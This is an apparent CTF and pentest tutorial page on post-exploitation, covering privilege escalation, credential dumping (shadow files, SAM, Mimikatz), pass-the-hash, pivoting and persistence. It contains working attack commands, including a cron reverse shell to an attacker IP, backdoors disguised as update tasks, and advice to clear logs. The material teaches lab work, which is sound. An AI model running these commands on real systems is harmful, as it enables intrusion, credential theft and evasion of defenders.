Post Exploitation

Post-Exploitation

Maintaining access, escalating privileges, and moving laterally

14 min readUpdated 2026-04-16
#privilege-escalation#lateral-movement#persistence#pivoting#loot
TL;DR
  • The first minute on a new shell is for situational awareness — understand where you landed before running anything noisy
  • Automated enumeration (LinPEAS, WinPEAS) surfaces 90% of privilege escalation vectors in under five minutes
  • SUID binaries, writable cron jobs, and misconfigured sudo rules are the most common Linux privesc paths
  • Pass-the-Hash allows lateral movement using only the NT hash — plaintext passwords are not required
  • Every artefact you leave (uploaded tools, log entries, created accounts) is future forensic evidence — clean as you go

Overview

A shell is just the beginning. Post-exploitation covers everything that happens after initial access: understanding your position, escalating to root or SYSTEM, harvesting credentials, moving through the network, and establishing persistence. Speed and stealth are competing priorities — move fast enough to complete objectives, slow enough to avoid triggering alerts.

Prerequisites

  • You have a foothold — an active shell or Meterpreter session on a target
  • Familiar with both Linux and Windows command-line environments
  • Completed the Exploitation phase, or you have an equivalent entry point from a CTF challenge

Recommended lab: HackTheBox Tier 2+ machines. TryHackMe "Post-Exploitation Basics" room and the "Windows PrivEsc Arena" room. PEASS-ng runs on any vulnerable machine.

Situational Awareness

First minute of a new shell — understand where you landed before doing anything noisy.

bash
# Linux — who, what, where
id && whoami
uname -a
hostname
ip a
cat /etc/os-release
ps aux
env

# Who else is logged in?
who
last -a | head -20

# What can we sudo?
sudo -l
powershell
# Windows — equivalent survey
whoami /all
systeminfo
ipconfig /all
net user
net localgroup administrators
tasklist /v

Privilege Escalation

Linux PrivEsc

bash
# Automated enumeration — run this first
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh 2>/dev/null | tee linpeas_output.txt

# SUID binaries — check against GTFOBins
find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null | xargs ls -la

# Writable cron jobs
cat /etc/crontab
ls -la /etc/cron*
find / -writable -type f 2>/dev/null | grep -v proc

# Kernel exploits
uname -r   # compare against known vulns
searchsploit linux kernel $(uname -r | cut -d'-' -f1)

Windows PrivEsc

powershell
.\winPEASx64.exe

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Token impersonation (SeImpersonatePrivilege)
whoami /priv   # look for SeImpersonatePrivilege
# > use PrintSpoofer or GodPotato
.\PrintSpoofer64.exe -i -c cmd

Credential Harvesting

Linux

bash
# Shadow file (needs root)
cat /etc/shadow
unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null

# History files
cat ~/.bash_history
cat ~/.zsh_history
find / -name ".bash_history" 2>/dev/null

Windows

powershell
# SAM database (local accounts)
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
# Then offline: secretsdump.py -sam sam.bak -system system.bak LOCAL

# LSASS dump (requires SYSTEM)
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# Credential Manager
cmdkey /list

Lateral Movement

Pass-the-Hash

bash
# Authenticate with NTLM hash instead of plaintext password
evil-winrm -i 10.10.10.5 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

# Via impacket
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@10.10.10.5
wmiexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@10.10.10.5

Pivoting

bash
# SSH local port forward — expose internal service on your machine
ssh -L 8080:internal-server:80 user@jumphost

# SSH dynamic proxy (SOCKS5) — route all traffic through target
ssh -D 1080 user@jumphost
# Then: proxychains nmap -sT -Pn 192.168.1.0/24

# Chisel — when SSH isn't available
# On attacker:
chisel server -p 8000 --reverse
# On target:
chisel client 10.10.14.2:8000 R:1080:socks

Persistence

bash
# Linux — cron backdoor
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1") | crontab -

# Linux — SSH authorized key
echo "ssh-rsa AAAA...your-key..." >> ~/.ssh/authorized_keys

# Windows — registry run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"

# Windows — scheduled task
schtasks /create /tn "WindowsUpdate" /tr "C:\Temp\payload.exe" /sc minute /mo 5

Operational Notes

  • Clean up artefacts — remove uploaded tools, clear logs where possible (history -c, clear Event Logs).
  • Avoid Mimikatz on disk — use in-memory execution (Invoke-Mimikatz) or lsassy remotely.
  • Document lateral movement — map the network as you go, note credentials and their scope.
  • Keep shells alive — upgrade to meterpreter or establish SSH tunnels; raw netcat shells die easily.

What to Read Next

  • Password Attacks — credential harvesting from this phase feeds directly into cracking and Active Directory attacks
  • Reconnaissance — pivot into a new network segment and you are back at step one
  • Forensics — understand the artefacts your actions leave behind for blue team to find
← PreviousExploitationNext →Active Directory Enumeration
← back to knowledge base